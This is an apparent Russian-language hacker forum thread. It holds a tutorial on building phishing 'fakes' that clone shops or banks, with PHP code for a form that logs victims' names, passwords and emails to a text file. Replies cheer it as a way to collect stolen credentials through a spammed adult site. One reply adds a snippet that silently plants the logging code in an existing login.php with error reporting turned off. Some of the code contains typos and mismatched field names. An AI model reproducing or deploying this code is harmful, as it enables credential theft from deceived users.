what's it? Fake(фейк) в переводе с английского-подделка,обман. Фишинг бывает трех видов 1)Почтовый. 2)Онлайновый. 3)Комбинированный. Первый из них самый старый,сейчас уже не актуалент почти.Второй - онлайновый подрузумевает под сабой копирование сайта(например е-шопа),регистрацией похожего доменого имени,в тоже зоне что и офф.шоп.Только разница лишь в том что на нем предлагаются товары по очень низким ценам(привет эльдорадо -)),ну и как ты понял,товар до покупателя не когда не дойдет -),а вот ту инфу что он вбил в форме может нести вполне ощутимую информацию.Третий вид наиболее актуален в данное время.Он подрузумеват под собой полное копирование конторы(например банка ну или сайтов связанных с электронной комерцией),на него юзер заманивается 2-мя спосабами: 1)троем 2)спамом. Let's go . для начали просмотрим небольшую хтмл форму PHP: <form action="evil_script.php" method="post"> <input type="text" name="name"> <input type="text" name="passwod"> <input type="text" name="email"> <input type="submit" value="send"> для тех кто не очень знаком с хтмл я кое что обьясню: evil_script.php - сообственно говоря наш "зло_скрипт" который будет обрабатывать все данные что ввел юзер и отправляться в виде пакета методом POST. Первым делом мы обрабатываем вводимые данные пользователем суперглобаным массивом $HTTP_POST_VARS($_POST сокращенно) делается это слеудющим образом, в нашем случаем у нас три значения - name,password,email PHP: <? $n = $_POST['name']; $p = $_POST['password']; $e = $_POST['email']; ?> вроде пока все верено.смотрим след пункт,что у нас нас ? правельность вводоимых данных.Конечно можно заюзать регулярные выражения,но есть одно НО.Мы веть не знаем какого вида у нас будет точно логин,пароль? единственное можно заюзать регулырне выражения например для email. PHP: if(!preg_math("/[0-9a-z_]+@[0-9a_z^\.]+\.[a-z] {2,3}/i",$email)) { echo "неверно введен e-mail.Введите адрес электронной почты в виде [email protected]"; exit; Проще там проверить ввел ли данны юзер в поля name,password,email.можно конечно реализовать с помошью функции empty(), но я передпочел более легкий способо при помощи функции strlen(). PHP: if((!strlen($_POST['name']) > 0) || (!strlen($_POST['pass']) > 0) || (!strlen($_POST['email']) > 0)) { echo "не все данные введены"; echo "<br>"; echo '<a href="'.$_SERVER['PHP_SELF'].'">вернуться обратно</a>'; } Теперь данные должны записывать в файл.Причем запись должна осуществляться с конца строки. Юзать мы будем на выбор или fwrite() или fput() мне больше по душе fwrite(),сам хз почему. для начала созданим на сервере файл , в нашем случаем 1.txt и не забуть выставит на него права (chmod +x) далее все реализуется очень просто . PHP: else { @$f = fopen("1.txt","a"); if(!$f) { echo "файл отсутвувет!"; } else { @fwrite($f, "name:$n;password:$p;email:$e \n"); } fclose($f); }
"перехват форм на php or faq по фейкам" помоему нармальная и нужная faqшка =) парень расписал как сливать внесенные данныее! тоесть делай сайт с порнушкой рекламь и делай базу кред ! причем всегда валид =)))
Смысл статьй мне всё равно не ясен к чему это ???? Зачем перехватывать формы на своём же сайте ??? илиэто я не вьехал =(
PHP: if((!strlen($_POST['name']) > 0) ржунимагу не проще PHP: if((strlen($_POST['name']) == 0) ? а вообще, если уж решил написать тутор, писал бы сразу весь код и комментами пояснял что да как.
ггг, вводит юзверь данные а ему пишет это. мда. Имхо бред бредом, полозности 0 в квадрате =) ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =)
Nova >Зачем перехватывать формы на своём же сайте цель только одна перехватывать данные что ввел юзер(если не понятно для чего нужен фейк почитай на форуме cw) Дикс >ржунимагу если нет разницы зачем писать по другом и "ржать" ? Green_Bear >ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =) ну эт уже просто придирки %)
Че еще за злоскрипт? Нах он нужен? Проще будет в файл по умолчанию, например login.php встатить код PHP: @ini_set('error_reporting',0); $n=$_POST["name"]; $p=$_POST["password"]; $f = fopen("1.txt","a"); fwrite($f, "name:$n;password:$p\n"); fclose($f);
